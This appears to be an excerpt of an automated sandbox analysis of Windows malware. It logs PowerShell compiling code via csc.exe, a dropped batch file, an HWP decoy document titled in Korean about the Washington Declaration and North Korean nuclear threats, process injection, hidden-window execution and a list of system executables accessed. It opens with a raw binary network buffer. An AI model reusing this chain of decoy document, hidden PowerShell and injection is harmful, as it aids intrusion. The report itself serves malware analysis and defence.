 buffer: fba¤Lº :Ênéá.$Uªazö£´{%¢@«=Ý Uj6”µO0‹uÇö] ]eVÿ•ÌQÑå#Uƒ›r‡«H†¥ $hԆeäRK½RKȬ.Ú )kB—tiYc–óm0ª…Ù”€-ìö=X9øÌDÉ»¬œAÐ/b˜°8÷é™´@5Åß_rãq¶iOSP¥
socket: 1328
sent: 166
1 166 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline"
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\230509.bat"
parent_process powershell.exe martian_process "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp
Process injection Process 3012 resumed a thread in remote process 2200
Process injection Process 284 resumed a thread in remote process 452
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 452
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe